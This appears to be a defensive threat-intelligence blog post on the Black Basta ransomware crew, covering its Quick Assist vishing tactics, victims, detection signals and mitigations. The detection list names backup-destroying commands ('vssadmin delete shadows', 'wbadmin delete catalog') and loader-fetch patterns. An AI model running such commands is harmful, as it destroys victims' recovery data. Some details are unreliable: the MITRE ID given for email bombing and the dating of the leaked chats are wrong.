BIPI
BIPI

Black Basta: The Conti Spinoff That Made Quick Assist a Phishing Vector

Threat Intelligence

Black Basta inherited Conti's playbook and made it worse. The 2024 pivot to Microsoft Quick Assist social engineering shows a crew adapting faster than most defenders.

By Arjun Raghavan, Security & Systems Lead, BIPI · August 11, 2024 · 8 min read

#black-basta#ransomware#conti#threat-intelligence

Black Basta is the closest thing the post-Conti ecosystem has to a flagship operation. Active since April 2022, the crew has claimed more than 500 victims publicly and has been linked to billions in extorted ransom demands. The 2024 evolution into Microsoft Quick Assist abuse is the kind of pivot defenders need to track in real time.

Actor Profile

Black Basta emerged immediately after the Conti leak in early 2022 and is widely assessed to be a Conti spinoff. Tracked as Storm-1811 by Microsoft for its access-broker activity. The leaked internal chats from February 2024 (the 'BlackBastaGPT' / Exploit forum leak) confirmed Russian-speaking operators, internal disputes, and significant overlap with FIN7 tooling.

Attribution caveat: Black Basta is a closed RaaS, not an open affiliate program. The number of operators is small relative to LockBit-era crews, which makes the leaked chats particularly valuable as ground truth.

TTPs

The 2022-2023 playbook was Qakbot/Qbot phishing into Cobalt Strike into network-wide encryption. The 2024 evolution shifted heavily into voice phishing and abuse of legitimate remote tools after Qakbot was disrupted by Operation Duck Hunt in August 2023.

  • Email bombing: thousands of newsletter signups to flood a victim's inbox (MITRE T1593)
  • Follow-up phone call from a fake IT support impersonator offering to help with the email storm
  • Social engineering victim into running Microsoft Quick Assist or AnyDesk and granting remote control
  • Drop of Cobalt Strike, Pikabot, or DarkGate loaders post-access
  • Use of ConnectWise ScreenConnect vulnerabilities (CVE-2024-1709) for initial access into MSP-managed estates
  • Backup destruction (Veeam, Datto), shadow copy deletion, BitLocker abuse, then file encryption with ChaCha20

Notable Victims

Ascension Health (May 2024, the highest-impact healthcare ransomware event of the year), Capita, Hyundai Europe, ABB, Dish Network, multiple US municipal governments, several large law firms, and Synlab Italia. Black Basta's healthcare targeting prompted a joint CISA, FBI, HHS, and MS-ISAC advisory in May 2024.

Quick Assist is in every supported Windows build. The adversary did not need an exploit. It needed a phone.

Detection Signals

The Quick Assist pivot is the most operationally important detection target. The legitimate use cases for the tool are narrow, and the abuse signature is clean.

  • quickassist.exe execution on endpoints with no IT-side ticket correlation
  • Sudden spike in inbound newsletter signup confirmations to a single user (precursor to vish)
  • Process tree: quickassist.exe spawning curl, certutil, or PowerShell within 10 minutes of launch
  • Cobalt Strike beacon, Pikabot, or DarkGate loader execution following remote assistance session
  • vssadmin delete shadows, wbadmin delete catalog, or Veeam.Backup process termination

Defensive Controls

Most environments do not need Quick Assist enabled by default. That single policy change cuts the 2024 Black Basta initial-access vector cleanly.

  1. Disable or restrict Microsoft Quick Assist via Intune or AppLocker unless IT operations actively uses it.
  2. Require IT support callbacks to originate from IT, not the user. Train staff that real IT will never cold-call about email floods.
  3. Patch ConnectWise ScreenConnect immediately on disclosure. The 2024 CVE-2024-1709 chain was weaponized within 48 hours.
  4. Protect Veeam, Datto, and other backup management consoles with phishing-resistant MFA and separate credential boundaries.
  5. Subscribe to the Black Basta CISA advisory IOC feed and hunt monthly against retained logs.

Black Basta is the operational template for the post-Conti ransomware market. The crew has shown it will rotate initial-access vectors aggressively when one is disrupted. Defenders who get ahead of the Quick Assist pivot now will be better positioned for whatever the 2025 vector becomes.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.